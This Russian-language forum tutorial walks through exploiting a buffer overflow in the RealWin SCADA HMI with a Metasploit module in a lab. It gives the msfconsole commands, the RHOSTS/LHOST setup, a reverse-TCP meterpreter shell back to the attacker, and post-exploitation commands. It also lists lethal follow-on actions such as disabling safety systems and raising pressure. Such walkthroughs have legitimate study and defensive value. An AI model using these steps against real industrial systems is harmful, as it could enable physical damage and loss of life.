Взлом SCADA: атака на системы SCADA/ICS через человеко-машинный интерфейс (HMI)

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
152
Депозит
-8.95$
Добро пожаловать обратно, мои начинающие кибервоины SCADA/ICS!

Давайте начнём с поздравлений за вашу дальновидность и решение изучить вопросы взлома и безопасности SCADA/ICS. Это, безусловно, САМАЯ важная проблема безопасности в этом десятилетии!

В целом взломы SCADA/ICS были двух типов:

  1. Взломать протоколы (modbus, DNP3, Profitnet и т. д.);
  2. Взломать человеко-машинный интерфейс (HMI)
В этом уроке мы продемонстрируем взлом системы HMI с использованием переполнения буфера в программном обеспечении для мониторинга.

Интерфейс «человек -машина »

В большинстве систем SCADA/ICS предусмотрена специализированная система управления и мониторинга промышленной системы. В отрасли её часто называют человеко-машинным интерфейсом (ЧМИ). Эта система критически важна для управления промышленной системой, но также может стать серьёзным инструментом для злоумышленников. Если злоумышленнику удастся взломать ЧМИ, он станет владельцем вашей промышленной сети!

В большинстве случаев HMI находится за пределами корпоративной сети, как показано ниже. К сожалению, в некоторых случаях HMI находится внутри корпоративной сети, что делает его уязвимым для злоумышленника, скомпрометировавшего корпоративную сеть ( см. атаку BlackEnergy3 ).

6a4a49_eedfff9f800b4ffea03d471d0fe1d850~mv2.jpg


Лучшая практика — изолировать HMI от корпоративной сети (см. модель топологии Purdue ниже).

6a4a49_d86728dd2fd74525af232e8aa39ce19c~mv2.jpg


Эти HMI обычно представляют собой системы на базе Windows со специальным программным обеспечением, установленным для управления и мониторинга всех промышленных систем, аналогичных показанным ниже.

6a4a49_1475d7e5aba14fe78444bdb5cdc0c0fb~mv2.jpg


Это программное обеспечение SCADA/HMI так же подвержено уязвимостям, как и любое программное обеспечение Windows.

В этом руководстве мы будем эксплуатировать уязвимую систему HMI, используя переполнение буфера в программном обеспечении HMI. Получив контроль над системой HMI, мы владеем всей промышленной сетью, и тогда могут быть выполнены неизвестные вредоносные действия, в том числе:

  1. Отключение датчиков и сигнализаций
  2. Повышение температуры и давления
  3. Изменение состава и концентрации химикатов
  4. Изменение логики лестницы
  5. Отключение средств безопасности
Любое из этих изменений в системе может иметь смертельные и серьезные экономические последствия.

Шаг №1: Сервер RealWin

В этой атаке мы будем атаковать систему HMI с помощью RealWin Server. RealWin Server — это продукт DATAC RealWin, ирландской софтверной компании, приобретенной техасской Lufkin Industries.

Демонстрационный сервер RealWin можно загрузить здесь .

Установите его в систему Windows XP. Конечно, это относительно старый эксплойт, но индустрия SCADA/ICS очень медленно обновляет и совершенствует системы в силу специфики своего бизнеса (во многих случаях возможность обновления есть только раз в год). В любом случае, новички в кибербезопасности не осознают, что промышленные системы часто работают на очень старых и устаревших системах по разным причинам (см. Shodan, Поиск устаревших и уязвимых систем ).

После загрузки и установки сервера RealWin щелкните значок на рабочем столе, и откроется интерфейс, подобный показанному ниже.

6a4a49_163bcc7d99704d5186edcd607915add9~mv2.png


Обратите внимание, что это программное обеспечение HMI предназначено для работы в телекоммуникационной, электроэнергетической, нефтегазовой, судостроительной и водохозяйственной отраслях. Если кликнуть на модуль «Электроснабжение», откроется карта объектов в районе Нью-Йорка (конечно, её можно настроить для любого региона).

6a4a49_df5f1c60fb79490ca0cb7912e9d7d6ce~mv2.png


Шаг №2: Откройте Metasploit

Следующий шаг — открыть Metasploit в Kali. Если вы не знакомы с Metasploit, остановитесь здесь и прочитайте мою серию статей о Metasploit, состоящую из нескольких частей, здесь .

Metasploit предлагает большое количество модулей SCADA/ICS. Полный список всех модулей SCADA Metasploit можно найти здесь .

kali > msfconsole

6a4a49_bbb604267afc4235a9a849f5425feb30~mv2.png


Теперь давайте поищем модули realwin HMI.

msf5> поиск realwin

6a4a49_0dd19cb049684cf2bbd524bd9fd302c0~mv2.png


Как видите выше, есть шесть модулей, в названиях которых есть Realwin. Давайте попробуем модуль realwin_scpc_initialize . Его можно загрузить в память, введя:

msf5> используйте exploit/windows/scada/realwin_scpc_initialize

6a4a49_c6f4710b9b0644d9852362cca4d45eee~mv2.png


Чтобы узнать больше об этом модуле, введите «info»

msf5 > информация

6a4a49_27a2be94728d42db89b5f4a205d0e420~mv2.png


Как видно выше, этот модуль по умолчанию использует порт 912 и отправляет «специально созданный пакет» для выполнения произвольного кода в системе. В качестве полезной нагрузки автоматически была выбрана « windows/meterpreter/reverse_tcp ». Оставим значение по умолчанию как есть.

Шаг №3 : Подготовка эксплойта к выполнению

Теперь давайте рассмотрим параметры. В эксплойте их немного, и ещё меньше нужно настроить. Как видно ниже, для этого эксплойта нам нужно всего лишь установить параметры RHOSTS (удалённые хосты) и LHOST (локальный хост).

msf5 > показать параметры

6a4a49_2473cdbf4b5a44059019e0be1d80f2c1~mv2.png


Давайте установим эти переменные с IP-адресом нашей системы HMI (RHOSTS) и нашей системы Kali (LHOST).

6a4a49_fef4bd62254641a2a7db209805285719~mv2.png


Теперь мы готовы использовать этот HMI и, надеемся, взять под контроль весь промышленный объект!

msf5> эксплойт

6a4a49_7329e2990a0b44ec84fa1849eb08a281~mv2.png


Успех! Как видите выше, нам удалось получить приглашение meterpreter в системе HMI. При вводе «sysinfo» была выведена системная информация о системе HMI.

Давайте посмотрим, в каком каталоге системы HMI мы находимся, введя pwd.

meterpreter> pwd

6a4a49_4705b621be734ac68277343e911d29ee~mv2.png


Как видите, мы вошли в HMI через программу мониторинга DATAC Realwin, и представленные данные находятся в каталоге C:PROGR~1DATACReal.Win. Введя «dir», мы увидим все программные файлы этой программы мониторинга.

Краткое содержание

Безопасность SCADA/ICS — важнейшая проблема безопасности этого десятилетия, но мало кто уделяет ей должное внимание. В любом геополитическом противостоянии или конфликте противники непременно нацелятся на системы SCADA/ICS. В прошлом эти системы подвергались взлому как минимум двумя способами: атаками на протоколы или атаками на HMI. В этом руководстве мы продемонстрировали использование переполнения буфера для получения контроля над HMI и, таким образом, над всем промышленным объектом!
 
Назад
Сверху Снизу